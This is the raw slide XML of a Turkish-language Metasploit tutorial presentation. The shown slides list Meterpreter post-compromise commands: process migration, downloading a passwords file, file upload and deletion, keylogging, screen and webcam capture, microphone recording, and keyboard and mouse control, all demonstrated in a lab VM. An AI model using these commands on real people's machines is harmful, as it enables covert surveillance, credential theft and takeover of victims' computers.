              <a:t> komutunu girdikten sonra kullanıcının dosyayı çalıştırmasını bekleyebiliriz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dosya çalıştığı andan saniyeler sonra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(oturum) açılacak.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="132010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7876" y="332656"/>
            <a:ext cx="10729192" cy="1020762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" err="1"/>
              <a:t>Hackledikten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0"/>
              <a:t> Sonrası</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="İçerik Yer Tutucusu 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1527876" y="1844824"/>
            <a:ext cx="9679104" cy="4680520"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ile nerde olduğuma bakıp cd ile dosyalar arasında gezinebiliriz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> komutu ile çalışan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>processleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> öğrenebiliriz ve herhangi bir sistem işlemine geçiş yaparak daha kalıcı ve stabil bir bağlantı sağlayabiliriz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>migrate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processid</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>download</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> passwords.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>İstediğimiz herhangi bir dosyayı makinemize indirebiliriz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> cat.jpg </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>İstediğimiz herhangi bir dosyayı </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hacklediğimiz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> bilgisayara yükleyebiliriz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rm,mkdir,edit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ile dosyaları </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>silip,düzenleyebiliriz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keyscan_start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ile kullanıcının klavye vuruşlarını kaydetmeye başlayabiliriz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keyscan_dump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> diyerek kaydedilen bilgileri </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>görebilirz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keyscan_stop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ile  kaydetmeyi durdurabiliriz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="219674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7876" y="332656"/>
            <a:ext cx="10729192" cy="1020762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" err="1"/>
              <a:t>Hackledikten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0"/>
              <a:t> Sonrası - Devam</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="İçerik Yer Tutucusu 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1527876" y="1844824"/>
            <a:ext cx="9679104" cy="4680520"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>screenshare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  komutu ile kullanıcının ekranını canlı olarak izleyebiliriz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>screenshot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ile ekran görüntüsü alabiliriz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>record_mic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ile kullanıcının sesini kaydedebiliriz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sanal makinede çalıştığımız için herhangi bir ses aygıtı bulunmamakta bu yüzden kamera ve ses komutları çalışmayacaktır fakat gerçek bir bilgisayarda bu komutlar işlevini yerine getirir.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>webcam_stream</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Kamerasını canlı olarak izleme.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>webcam_snap</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Anlık kamera görüntüsü alma.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>webcam_chat</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Video </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>chat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> başlatma.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>play</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> komutu ile karşı bilgisayarda bir ses dosyayı bile yürütebiliriz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="307331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7876" y="332656"/>
            <a:ext cx="10729192" cy="1020762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" err="1"/>
              <a:t>Hackledikten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0"/>
              <a:t> Sonrası - Devam</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="İçerik Yer Tutucusu 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1527876" y="1844824"/>
            <a:ext cx="9679104" cy="4680520"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keyboard_send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> "I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hacked</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you</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bro</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xd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Keyboard_send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ile çift tırnak içerisinde yazılan cümleyi kullanıcının bilgisayarında yazdırabilirim.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keyevent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 13</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bu komut ile herhangi bir dosya seçiliyse kullanıcı o dosyayı çift tıklamış gibi açacaktır.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mouse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mouse komutu ile de kullanıcının fare hareketlerini kontrol edebiliriz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>reboot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> komutu ile bilgisayarını yeniden başlatabilir veya </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>shutdown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> komutu ile kullanıcının bilgisayarını kapatabiliriz.</a:t>
            </a:r>
          </a:p>
          <a:p>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6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azı Tahtası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94_TF02804846_TF02804846" id="{EB671898-DFF6-4A21-9F6F-F4BD7303EE4C}" vid="{EA7E2B1D-C724-4643-A28D-720D24334D37}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme2.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Yazı tahtası eğitim sunusu (geniş ekran)</Template>
  <TotalTime>286</TotalTime>
  <Words>732</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Özel</PresentationFormat>
  <Paragraphs>85</Paragraphs>
  <Slides>14</Slides>
  <Notes>14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Consolas</vt:lpstr>
      <vt:lpstr>Corbel</vt:lpstr>
      <vt:lpstr>Yazı Tahtası 16x9</vt:lpstr>
      <vt:lpstr>Metasploit Framework</vt:lpstr>
      <vt:lpstr>Metasploit Nedir?</vt:lpstr>
      <vt:lpstr>Ne Yapacağız?</vt:lpstr>
      <vt:lpstr>Zararlı Kod(payload) Oluşturma</vt:lpstr>
      <vt:lpstr>Metasploit İçerisinde Bağlantıyı Yakalama</vt:lpstr>
      <vt:lpstr>Metasploit İçerisinde Handler Ayarları</vt:lpstr>
      <vt:lpstr>Hackledikten Sonrası</vt:lpstr>
      <vt:lpstr>Hackledikten Sonrası - Devam</vt:lpstr>
      <vt:lpstr>Hackledikten Sonrası - Devam</vt:lpstr>
      <vt:lpstr>Multi/handler Ayarları </vt:lpstr>
      <vt:lpstr>Bağlantı Oluştuğu An ve Migration(Göç)</vt:lpstr>
      <vt:lpstr>Download ve Upload İşlemleri</vt:lpstr>
      <vt:lpstr>Ekran Kaydı,Görüntüsü ve Klavye Hareketleri</vt:lpstr>
      <vt:lpstr>Fare Hareketleri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Başlık Düzeni</dc:title>
  <dc:creator>MUSTAFA AKBULUT</dc:creator>
  <cp:lastModifiedBy>MUSTAFA AKBULUT</cp:lastModifiedBy>
  <cp:revision>18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-03-26T23:18:24Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-03-28T15:40:37Z</dcterms:modified>
</cp:coreProperties>
</file>